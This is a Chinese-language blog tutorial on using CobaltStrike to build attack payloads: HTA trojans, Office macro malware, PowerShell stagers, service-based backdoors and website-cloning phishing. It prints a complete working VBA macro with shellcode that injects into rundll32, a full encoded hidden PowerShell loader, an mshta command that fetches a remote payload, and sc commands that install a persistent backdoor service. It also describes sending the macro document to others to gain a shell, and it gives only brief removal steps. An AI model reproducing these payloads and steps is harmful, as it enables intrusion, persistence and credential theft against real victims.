CobaltStrike-006-创建Attacks

发表于 更新于 分类于 Waline:
创建攻击Attacks,生成后门与钓鱼攻击

创建payloads

image-20240908164759567

这里Attacks有几种,如下:

  • HTML Application 生成一个恶意HTML Application木马,后缀格式为 .hta。通过HTML调用其他语言的应用组件进行攻击,提供了可执行文件、PowerShell、VBA三种方法。

  • MS Office Macro 生成office宏病毒文件;

  • Payload Generator 生成各种语言版本的payload,可以生成C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、Ruby、VBA等shellcode

  • Windows Executable 生成32位或64位的exe和基于服务的exe、DLL等后门程序

  • Windows Executable(S) 用于生成一个exe可执行文件,其中包含Beacon的完整payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将StagelessPayload注入内存

HTML Application

image-20240908164935030

HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。HTML Application有三种类型的生成方式,测试发现,只有powershell方式生成的hta文件才能正常执行上线,Executable和VBA方式生成的hta文件执行的时候提示当前页面的脚本发生错误。

基于PowerShell方式生成的hta文件,执行上线:

image-20240908170149742

image-20240908170010804

执行mshta上线成功:mshta http://xx.xx.xx.xx/file.ext

基于Executable方式生成的hta文件,执行报错如下:

image-20240908165845581

基于VBA方式生成的hta文件,执行报错如下

image-20240910150826836

MS Office Macro

Payloads –> MS Office Macro:

image-20240910151338348

然后选择一个监听器,点击Generate:

image-20240910151414896

然后点击Copy Macro:

image-20240910151431574

image-20240910151444616

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-72,34,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,79,51,116,102,0,80,-43,82,9,2,-79,107,117,-87,-46,12,13,34,8,-63,9,4,97,-49,-6,-108,-50,41,78,76,90,-114,23,-19,74,-97,89, _
-103,-5,57,-26,17,-109,-57,-104,-27,-72,46,23,-10,59,-23,45,119,125,-5,-39,-103,-46,-52,44,124,-9,41,-51,-126,117,83,56,-126,-4,-26,81,-21,26,7,-53, _
-67,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114,105, _
100,101,110,116,47,53,46,48,59,32,66,79,73,69,57,59,69,78,85,83,41,13,10,0,-10,-119,59,65,62,-3,-103,66,79,43,59,29,116,-46,1,116, _
-109,-86,-117,-117,1,-87,-23,87,-4,-11,83,90,-62,-68,51,-14,73,-108,-47,-99,-84,44,-24,70,77,20,28,-28,-51,126,-120,-116,-6,113,-2,-93,5,-8,113,-112, _
94,12,-72,55,-52,15,-33,48,68,-124,95,-40,10,-64,-72,8,118,-94,-32,-61,107,64,52,-57,69,96,-101,57,51,-30,-72,-92,-48,32,77,-38,21,-2,32,-94, _
105,54,28,30,-126,-45,-26,86,107,-15,-54,-45,-57,-90,-76,-112,-63,-66,-80,-124,-51,-105,-125,-23,103,118,-17,95,68,-56,10,-89,-7,-70,107,63,-110,118,18,64, _
50,-67,103,50,-101,104,-94,32,-54,-68,80,7,126,68,-111,41,78,77,-113,-58,-81,72,-53,-123,-72,-128,8,-2,68,-83,-65,-48,-80,-22,29,6,-23,29,-46,-17, _
-82,-67,-4,-56,-122,27,51,105,-70,-72,67,-28,-117,-16,116,66,-113,-121,-59,19,-32,98,103,52,33,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,56,46,49,51,52,46,50,48,49,46,57,54,0,58,-34,104,-79)
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If

    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

然后打开word编辑器,点击视图,然后点击宏:

image-20240910155852920

随便输入一个宏名,点击创建:

image-20240910155918158

先清除这里面的所有代码,然后复制CobaltStrike生成的代码,保存退出:

image-20240910155941551

将该文档发给其他人,只要他是用word打开,并且开启了宏,我们的CS就会收到弹回来的shell,进程名是rundll32.exe:

image-20240910160318230

word开启禁用宏:文件——>选项——>信任中心——>信任中心设置

image-20240910160446930

Payload Generator

这个模块用于生成各种语言版本的shellcode,然后用其他语言进行编译生成:

image-20240910160757959

说明:

  • Stager是分阶段传送Payload

  • Stageless是完整的木马

这里主要讲两个payload:Payloads–>Stager Payload Generator下的Powershell 和 PowerShell Command 。这两个都是利用powershell进行上线。

image-20240928151439844

PowerShell

选择该payload会生成一个payload.ps1文件,可以选择如下方式上线powershell下:

1
2
3
Import-Module .\payload.ps1

. .\payload.ps1

image-20240928152209188

image-20240928152255181

image-20240928152358768

image-20240928152842624

image-20240928153439794

cmd下

1
2
3
powershell Import-Module .\payload.ps1

powershell .\payload.ps1

image-20240928153641035

PowerShell Command

选择该payload会生成一个payload.txt文件,可以选择如下方式上线:

直接复制该文件内容在cmd下运行即可上线

image-20240928153844190

image-20240928153919340

image-20240928153948406

上述三种上线的方式,站在受害者主机视角,都是如下:
image-20240928154121639

image-20240928154645570

1
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAEQAQwBKAEcAbQAxAGIAOABkAGEAZQB6AFMAUQBIAFIAYgB5AEMATgBpAGgAZQArAG4AUQA2AEIAWgBSAGEAVwB0AHkASwBBAHMARwB6ADgAOQArADMAUQBPADMAcAAyAGUAbgBaAG4AVwBUAFgAeABGAEEARgA3ACsAVwBwADUANwAzAFUAcQAwAEgANgBvAEYARwBDAFQAQwBxADcARgB1AFEAZQBkAEUAZwBDADUARABvAGMAZgAzACsALwBEAFIAMgBUAHAAdQB0ADAAOABiAGEARAA5AE0AMABqAHIAdgBrAEcATABJAHYAQQBJAE8ARAArAHYAcgArAGIAQQBRAEoAcwBMAHYAOABsAEEAdQBUAE4AZABxADAAUQB3AHgASwBYAGIAVgBKAEIAYQBJAFUARQBGAHUANwB1ADcAdQArAHkAVgA2AEUAVABnAEMAMQA4AGMAdwBCAEYARQBYAHkAegBJAGQAMgA3AFYAcwBCADkANQBmAEkAdgBnAHUAZQBKAHIAZwAyAFEAOAAvAHIASABIADkAMgBRAEUATwBqAFEAeQA3ADcAYwBoADEAUQBJAEEAbQBnAGIARwBNAEUAZwBYACsARAArAHkAUwAzADMAawBNAEMASABxAFgARwBBAEoAdQBYACsANQByADYAOABsAGYAdgBZAE4AUQBDACsAaQBpAFYAZABZAE8ANwBaAEsAUQBUAEgAUwByADkATgBYAEIATwBrAEoAeQBoAHIASABrAFkAMABuAC8AdgByAHIAMQB6AGgANQBhAEgANgBXAHUANwA1AEkAYwBCAEIAUABxAGMAbABBAFkAVgAyADIAYwBJADQAVgArAEMAKwBGAFYASwBIADgAOABTAEQAKwBaAHkATQBUAE8ASQBHADcAcABhAFcAbAA4AGkAcAA4AGUAVgBGAGgAbAA3AEoAdwBNAHMAWAA3AEwAbgBDADkAVwBRADcARAA3AEIAegAvAFAAcQBRAHEAZABXAEwAVABqADcASABsAGoAUABHAGoAWABEAGgATQBGAGYAaQBYAGwASgAvAEwANgArAHYAMwBKAC8AdgBhAE4AVABRAG8AYwBpAEcANQBhAEYARABJAFgARQA5AEQAWgBJAEkAbQBUAEEAbwBEADQAQgBqAFkAYQBqAEMATABWAFAATABCAFMAeABtAHoAaQA1AFgAWQBDAEEASQBwAEMARgB4AHUAQgBzAFcAcABoAGUANQBSADUAagAvADQAbwBRAFkAbAA1AGoAZABsADkAKwAxACsANQBwAFgANABPAGwARwA3AHUAOABxADUAVAA4AHEATQBhAGsAWgBKAFkAWABTAE4AUwBkACsAaAB3ADQANQB5ADUAdQBMAE8AWABhAGMAbgA5AEIALwBTAEsANABDACsALwAyAFUAWQBJAFgANwBiADUAKwBsAHEAZwBVAHgAMwBBAEUASwAzAHkAagBqADkAMABPAHUAMwB0AC8AZAB2AFcAUgBMAHkATQA2AFQAbgA3AGsAQgB5AHYAUwArAGMAcABVAFMASgB6AE0AUQBnAEwAbwBrAFMAYwBNADUASgB5AEUAcwB2AEgANgBQAHoAOABYAHQAVABUAE0AbwAvAGQASgBRADkAYQBaADEAMQBiAG0ARQA1ADQATABqAEsALwBlAGkAdQA4AGgANgB2AGIAOAByADMARgArAHoASgAzADMALwBaAG8AUQBJAFcANQBDAGsAMwAzADkAZABEAFMATABjAEkAZwBlAEsAaQBRAE4AcwBaAE4ANABTAFAAdgA5AFoAegBPAEEAVwB3ADQAeQBQADgAawAxAE0AWQBUAGoAegB1AGUAcwBIAGEASQBsAFgAZABuAEkAcABvAFMAOAAvAHEALwBWAHMAUgBOADkAMQBPAHgAZAB3AGcAcwBuAGkASABqAEIAVQBMAEMAVQBLAFAANABLADUAeABEAEMAZgBHAHoAbwB5AHQAQgBsAC8AbAB6ADEATAAwAHkAOQBiAFYAbQBiAHcASgBuADAAdAByAGUAVABtAFAAZAAyAG4AdQBkAHoARgBJAEEAaABLADMAQwB4AGsAZABXADYAVwBPAEEAMABDAEQASwAwAFMASgB6AGcAQgB1AG4ANABTAFEAdQBwAG0AeQA5AHgAMwB1AEgASwBJAEsAVABKAEIAUQBHAC8AbQBYAGcAdQBmAFUASABwADEAMwBYAFUAZABWAGoARwBoAHkAYQBMAEwAYQBKAGgAcgBIAGoAUQBSAHcAQwBrAHIASgBXADYAQQBMAE4AaABKAE4ATABTADcAUQBjAGgAOQB5AGsAawBYAFkATQB4AEsAagBsAG0ASwBXAEUAegBZAG0ANQBRAEwAagBhAFkANQBRADYAegBTAHYAKwBkAEgAbwBhAHgAQgBPAHIAUQA5AEQARwAwAG0AbgBYAFUAaABDAFkATQBkADYAegBuAFgAaQBzAHIAUwBEAGUAeQBnAGwAZgBzAFAAcwBHADkAMQBjAGkAbQBLAGwASwBzAGIAUwBSADkAQQBzAHcAVABRAHMARQB0AEwAbgBJADQASQBaAFgAMAB0AFYALwBvAHAAOABmADQAMwBlAEQAKwAyAG0AQgA5AGcAZABnAG0AOABCAGoASwBmAEYAZQBKAHcAeQB4AHIANgBwAFEAcwB3AGQAZwBKADAAWgBzADAAWQArAHQAeABUAEkAUwAzAEIAbAAwADUAQwAwADEAcgBLAHoASgBqAHAAZABmAFAAMQBuAGUAaQBNAFYAawBLAFoAawBrAFIAYwB1AHcATQBDADIASwB4AHIAVwBZAC8ATAA1ADIAcAA4AHUASQB2AGIAcwAwAGsAegBrAFEAOQBEAGYAcABTAHMASABTAFUAMgBIAFoAMwAwAEkAcQBrAFAAbQB2AHYANABtAFEAOQBkAGMAMAA2AEoAUAArAGkASgBiAEsAKwBhAGYAQgBEAGcAUAB2AGEATQAvAGMAUQBIADgAZQBSAHcAaQBOAHYAZABWAGQASwBiAEMAZgB3AEUATgBWAEUARABEAGMATgBKADUAKwB4AEkAeQBMAFMAWgAzAHYAUABVAFgAYQB0AHQATQBvAHcAVQB5AGMAVgBCAGEAOQB5AFYAbABnAHUAQQBEAG4ANwBtAEsANwBUAHIAVgBhAHMASABrAHMAbgBaAGIATwA3AEoAbABJAGYAdQArAHEAVAA0AHcAMgBnAG0AVwBNAHYASQBiAE4AcABqAFYAMgBwAFMAcABxAHUASAB2AGQAQQBqAHYAWABBADYAVwA0AGMAVABmADIASQBQAFUAWAAwAGYAaQBUAG8AZABSAGMAUAArADAAMgBEAE0AcgA4AEUAVABOAGwAbwB3ADAANwBmADgAMQBOAGYAYQAzADAAVQBnADMAWgAvAGIANgBSADcANQBYAFUAaABTAFAAMgB2AEcAUABxAHgAVgBtADMAQQA1AGEAcQAwAGQARAA4AEYAbAB1AEQAdQBmAEYARwBSAGEAWgB4AEgAeQBJAC8AWQArAGQARwBYAFQAQwAyAHIASwAyAGQAdwBlAGoAdwBmAGcAVgBSAGYAYQBzAFQAcQBlAEwAegBZAHIAeABrADAAVgArAEUAUQB5AG0AawBSAGIAZQB6AGoAUwBoAGMAVwB4AE4AdAB1AFEARABGAHMAawBNAFkAeABLAGkAaABPAFoALwBPAGkAOAA5AG8ANABiAFMALwBkADcAdABaAGsAeABYAEEAdwB3ADgAYwBNAFIAcwBoAHQAQgBaADUAaABjAFoAZQB4AFIAbwBtAGsAZAA5AGgAeAB2AHIATABIAC8AMQBMAEQATwBmAEQATAB3ADYAcQBCAEoARQBPAE0AMABaAG4ANQBhAEsAYgAvAG0ASQBqAGcATQBsADEAUABIAFgARQBuAEkATgB2AGUAOABxAEIANwBNAHQAaAAzADYARABZAGEANwBQAGwAQgBHADQAMQBWAE0AZgBEAG8AaQBmAG8AVAA5AHgAbgBSAG0AcAByAGcAegB2AFYAVAArAHUAWQA2AG4AVgBTAGIAdgBHADQAZgBKAEcAQgBTAEgAUwBEADYAQQA5AGoAbQBZAGoARwBHAFUAcgBwAE8AWgBPAEkANgBUADQAVwBIADQARgBIAFoAUwBQAFYARwB5AEoARQBOAGQASAAxAGEAUgAxADMAVgB3ADkARgB4AHAANABhAGkAVgB1AEUANwAzAE0AWAA3AGMAUwAwADIAMwB1AEsAZQB6AHkARQBOAFYASAB6AGMAZQBtADgAaAB1ADEANgByAHkAbwA2AGcAVQBJADcAbgB5AFoAUABSAGsARQBnAHMARQBLAHYATgA2AFEAQwBOAFgANwBrADUATwBPAEIAeQBHADEAbQBPAGwAWAB0AGYAaQBrAHgANwA2AFQAYgA0AHQAKwBHADAAQwBoAG4AcQBEAGQAQgBWACsAMABkAHUAbwBvAGoAMwBxAHEAYwBmAHEAcQB2ACsAcwBoAEgATQBKAGoAKwBlAFYAZABsAGYAcwByAEoAWABlAFMAWgA0ADgAOQArAEwAcABvAGoASgBhAGEAVQBkAHAAcAB1ADUAMwBvAHUARgAwAC8ATQAxAE8AMQBuAHEAbgB5AHIAdwB2AEsAQgBVAFcAawA4AEYAYwBVAHAAOABGAHYAbABvAFQANABvAFgAUwBVADMAZQBpADEAZgBNAFUAUwBUAFgAWABRAGoAWABRAHAAWgBqAHQAcQA5AEoAWQByAFcAdwBVAC8AWABUAFMAUgBWAFUAZQBUADkARAB4AHMATwBnAGYAaQA2ADEAQgBTAEIAYwBZADgAbABKADEAcQBsAHUAcQBxAFIAYwA3AEgAVgAxAEgAeQBaAGwAbwBDAEIANQBJAEIAMQBYAEMAZwBkAGQAVwA1AHYAMQBnAE4AUgBYADQAWQBMACsAWAArAG8ANgBtAHEAdQBqAFUAbABnAGIATAA4AFoAcgBzADEAOAArAFIARABiAHUAbgAzAFoASQBYAEgANAAzAEEAVABKADUATwBzACsAagBzAHkAawA5AEYAUAAzAFkAYwB0AEQANgBRAE8AdQBQAFIAYwBHAHUAZQA3AFMAcQBQAFYATgBkADkAUQAyAG8AVgBGAHkAUABCAFUANgBjAGIAZQBLADYAZQBwAEEAMABqAE0AcgBFAE4ATwBZAG0AWAB6ADYAUAB0AHcARQA5ADIATQAzAFUAbAAyAGEAcABXAG4AOABvAG0AOQBSADkAYgBsAFUAZgBDAEcALwBBAE0AagBJAEUAcQBLADUAUABhAFAAQgBaAFYAbgA4AEsAeAA3AFUATwBEADkAZQBtAEcAMgBaAHgAVgB4ADMAMgBnAHQAOQBhADcAUABVAGsAYQBNAFYAbQBNADEAdQBUAGMARgBYAFkAYgAzAGgAOQBVAEYAOQBEAGwAcAA4AHUAZwBzAHIARgA2AHkAbQBtADUAUwBjAGgAeABJAFoARgBhAGgASwB1AFMATABEAGIAMABjAGIAZwA4AGEAcgBHAEsAcABOADEAawBJAHEAOAA4AHUAeABFAHEAcwBkAEcAZgA4ADcAdgBkAFkAZQAzAFYANQB0AGkAVgBxAHAAZQBjADkAagBjAHMAVgAxAG0ATgBqAG8AMwBoAE8AYQAzAFYATQBWAGgAbgBOAFQAdgBlAHcATABwADEAaQB1AG0AWgBCADYAMwBPAHkAZQB5AEgAZgBzAHoAKwBGAFoAYQBUAHgAUwBXAFQAUABhAFUAeQB2AHMAKwB6AHYASgBhAE4AcABYADkAaQBlAFEAMgBhAG8AaQBNADAAagBZAFAAZQAwAEMAVwAvAHEANQBKAGgAMgBHAFYAMQBiADEAUgBnAGoAYgBaAEEAcwBqADQATQBtAFYAMgB6AEsARQA0AGkAcABXAFgAVwBPAG8ASABTADIAdwBzAHIAVQBlADMATgBlADcAcwBLAGsARABSADUAOAA3AGcASQB0AGEAeABOAGIAbAAzAEMASgBwADgANABuAFMAYgArAHcAYgBIAG4AQQA2AGIAYwBlADcATgBqAEwAWQA2ADEAMQB2AFIAOQBzAFoAaQAxAHcANwB2ADMAVAB5ADkAZgA0AHQAZgBiAEMAUABtACsAZgB6AEIAaQBaAHEANwBXAHUATAAvADcAZABwAHMAVgBJAHYAQwBoAFkALwA1AHEATQBwAE0AQgBDAGYAWQBBAHMAMAA3AEsAcABxAHYAYgAzAFMAaQA1AFIATAByAE8AUwBEAE0AWABwAFIAcgA1AC8ATwBkAGoALwBSAEUAUwBCADIASQAyADgAcgBLAGgAKwBIAGEAagBDAEIAaQA3AFoAagByAFYALwBXAEsAOAArAHYATwA5ADUANwBPAGIAYwA4AEcAVwBOAGYANwBUAFYAZQBIADcANQBWAEEAbwAzAEsANAA5AEkAOQB4AHUAcwA5AEgAbgBlAHMAVABiAEIAUABqADkARwB0AG0AdwA4ADUAVQArAEUARABtAEIAegBvADcAdQBTADEAdwBsAHIAbABVAHEAbABmAFIAWgByAHoAQgByAHYAMAA5AE0AMQAvAFcAUwAvAEwAdQA5AFUAagByADcAZgBZAEQAeQAwAFIAWABPAFgATAAwAFAAYQB5AFIAMABiAFAAaAAvAGoATQBFAFAAWAB2ADgANwB1AHkAbAAvADIAZgB6ADQAbgBiADAATQAwAGUAZQBVAHAAUgBmAHkAdgB3AEQAUABwAEkARwBUADMAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

Windows Executable & Windows Executable(S)

这两个模块直接用于生成可执行的 exe 文件或 dll 文件。Windows Executable是生成Stager类型的马,而Windows Executable(S) 是生成Stageless类型的马。那Stager和Stageless有啥区别呢?

  • Stager是分阶段传送Payload。分阶段啥意思呢?就是我们生成的Stager马其实是一个小程序,用于从服务器端下载我们真正的shellcode。分阶段在很多时候是很有必要的,因为很多场景对于能加载进内存并成功漏洞利用后执行的数据大小存在严格限制。所以这种时候,我们就不得不利用分阶段传送了。如果不需要分阶段的话,可以在C2的扩展文件里面把 host_stage 选项设置为false。

  • 而Stageless是完整的木马,后续不需要再向服务器端请求shellcode。所以使用这种方法生成的木马会比Stager生成的木马体积要大。但是这种木马有助于避免反溯源,因为如果开启了分阶段传送,任何人都能连接到你的C2服务器请求payload,并分析payload中的配置信息。在CobaltStrike4.0及以后的版本中,后渗透和横向移动绝大部分是使用的Stageless类型的木马。如搭建基于DNS的隧道时,得生成Stageless类型的马。

Windowss Executable(S)相比于Windows Executable,其中包含Beacon的完整payload,不需要阶段性的请求,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存。

注意,生成的Windows Service EXE生成的木马,直接双击是不会返回session的。需要以创建服务的方式启动,才会返回session。并且启动的时候,必须以管理员身份打开cmd才能创建服务。

image-20241008085603538

1
2
3
4
5
6
7
8
#注意,等号(=)后面要有空格
sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\win_service_beacon_x64.exe" start= auto DisplayName= autoRunBackDoor
#开启某个系统服务
sc start autoRunBackDoor
#停止某个系统服务
sc stop autoRunBackDoor
# 删除某个系统服务
sc delete service_name

针对64bit win7,使用windows stager payload下生成的windows service exe,执行的时候出现如下提示:服务没有及时响应启动或控制请求。

image-20241008094939952

换成windows stagerless payload下生成的windows service exe,成功执行:

1
sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\stagerless_winservice_beacon_x64.exe" start= auto DisplayName= autoRunBackDoor

image-20241008103120954

image-20241008103200078

在受害者主机上看到的进程与服务信息:
image-20241008104422462

虽然服务清单上看到,服务应该是没有启动的(左上角有”启动此服务”),但是在任务管理器中,rundll32.exe这个进程是存在的,该进程就是服务启动后对应进程,且在CS上是可以交互的:
image-20241008104714314

在被害者主机上抓包,过滤C2服务器与http协议,发现存在这个特征:

image-20241008111555646

image-20241008111630816

1
sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\stagerless_winservice_beacon_x64_01.exe" start= auto DisplayName= autoRunBackDoor

在实际测试的时候,出现了一个很诡异的事情,在windows7上测试上述基于服务运行的payload时,从CS上看,连接是在并且存活的,但是在windows机器上看,任务列表中有对应的任务(PID为1592),但是使用netstat -ano命令查看时,时有时无,并且网络连接很快就消失,如果不是知道C2的地址并且通过wireshark抓包,都比较难发现这个后门:

image-20241008124456112

image-20241008124826410

image-20241008124841066

如何解决这一类的后门呢:

  1. 通过netstat -ano找到恶意进程对应的PID
  2. 通过tasklist找到PID对应的进程命令:tasklist /fi “PID eq 1592”
  3. 通过taskkill 干掉进程:taskkill /PID 1592 /F
  4. 删除对应的服务: sc delete autoRunBackDoor

点击中间的Attacks——>Web Drive-by(网站钓鱼攻击)

  • web服务管理对开启的web服务进行管理;
  • 克隆网站 可以记录受害者提交的数据;
  • 文件下载 提供一个本地文件下载,可以修改Mime信息。
  • Scripted Web Delivery(S) 基于Web的攻击测试脚本,自动生成可执行的payload ,通常用这个模块来生成powershell命令反弹shell
  • 签名Applet攻击 启动一个Web服务以提供自签名Java Applet的运行环境;
  • 智能攻击 自动检测Java版本并利用已知的exploits绕过security;
  • 信息搜集 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

克隆网站

该模块用来克隆一个网站,来获取用户的键盘记录

然后访问URL